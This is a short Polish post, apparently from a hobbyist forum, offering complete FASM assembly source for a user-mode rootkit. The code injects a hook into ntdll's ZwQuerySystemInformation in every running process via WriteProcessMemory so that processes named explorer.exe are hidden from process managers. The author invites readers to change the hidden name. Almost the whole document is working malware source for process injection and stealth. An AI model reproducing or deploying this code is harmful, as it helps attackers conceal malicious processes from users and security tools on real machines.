Taki prosty rootkit (a raczej zabawka) ktory ukrywa wszystkie procesy o okreslonej nazwie (explorer.exe) przez managerami procesow (mozesz zmienic, ie zapomniej zmienic tez argumentu writeprocessmemory). Program niestety nie potrafi sprawdzic czy proces zostal juz otwarty, wiec uruchamiam go tylko raz. A hooka NtCreateProcessEx jakos mi sie nie chce zakladac Ani tymbardziej bawic na tokenach.

Metoda prymitywna, ale w um to przecierz zabawa.
Kod:
format pe gui
section '' readable writeable executable
mov eax,[lstrcmpiW]
mov dword [hook+15],eax
mov edi,[ZwQuerySystemInformation]
add edi,12
push 4
push 0x1000
push 409600
push 0
push -1
call [VirtualAllocEx]
test eax,eax
jz exit
mov ebp,eax
push 0
push 409600
push ebp
push 5
call [ZwQuerySystemInformation]
test eax,eax
jnz exit
list:
cmp dword [ebp],0
jz exit
add ebp,[ebp]
push dword [ebp+68]
push 0
push 0x1F0FFF
call [OpenProcess]
test eax,eax
jz list
mov ebx,eax
push 0x40
push 0x1000
push 4096
push 0
push ebx
call [VirtualAllocEx]
test eax,eax
jz list
mov ecx,eax
mov dword [jump+1],eax
add eax,78
mov dword [hook+36],eax
push 0
push 104
push hook
push ecx
push ebx
call [WriteProcessMemory]
test eax,eax
jz list
push ecx
push esp
push 0x40
push 7
push edi
push ebx
call [VirtualProtectEx]
pop ecx
test eax,eax
jz list
push 0
push 7
push jump
push edi
push ebx
call [WriteProcessMemory]
jmp list
exit:
ret
jump db 0xBA,0x00,0x00,0x00,0x00,0xFF,0xE2
hook db 0x83,0x7C,0x24,0x04,0x05,0x75,0x44,0x85,0xC0,0x75,0x40,0x56,0x57,0x53,0xBB,0x00,0x00,0x00,0x00,0x8B,0x74,0x24,0x14,0x89,0xF7,0x83,0x3E,0x00,0x74,0x28,0x03,0x36,0xFF,0x76,0x3C,0x68,0x00,0x00,0x00,0x00,0xFF,0xD3,0x85,0xC0,0x75,0x14,0x8B,0x0E,0x85,0xC9,0x75,0x08,0xC7,0x07,0x00,0x00,0x00,0x00,0xEB,0x04,0x03,0x0F,0x89,0x0F,0xEB,0xD7,0x89,0xF7,0xEB,0xD3,0x5B,0x5F,0x5E,0x31,0xC0,0xC2,0x10,0x00,'e',0x00,'x',0x00,'p',0x00,'l',0x00,'o',0x00,'r',0x00,'e',0x00,'r',0x00,'.',0x00,'e',0x00,'x',0x00,'e',0x00,0x00,0x00
section '' import readable
dd 0,0,0,RVA ntdll_name,RVA ntdll_table
dd 0,0,0,RVA kernel32_name,RVA kernel32_table
dd 0,0,0,0,0
ntdll_table:
ZwQuerySystemInformation dd RVA _ZwQuerySystemInformation
dd 0
kernel32_table:
OpenProcess dd RVA _OpenProcess
VirtualAllocEx dd RVA _VirtualAllocEx
VirtualProtectEx dd RVA _VirtualProtectEx
WriteProcessMemory dd RVA _WriteProcessMemory
lstrcmpiW dd RVA _lstrcmpiW
dd 0
ntdll_name db 'ntdll.dll',0
kernel32_name db 'kernel32.dll',0
_ZwQuerySystemInformation db 0,0,'ZwQuerySystemInformation',0
_OpenProcess db 0,0,'OpenProcess',0
_VirtualAllocEx db 0,0,'VirtualAllocEx',0
_VirtualProtectEx db 0,0,'VirtualProtectEx',0
_WriteProcessMemory db 0,0,'WriteProcessMemory',0
_lstrcmpiW db 0,0,'lstrcmpiW',0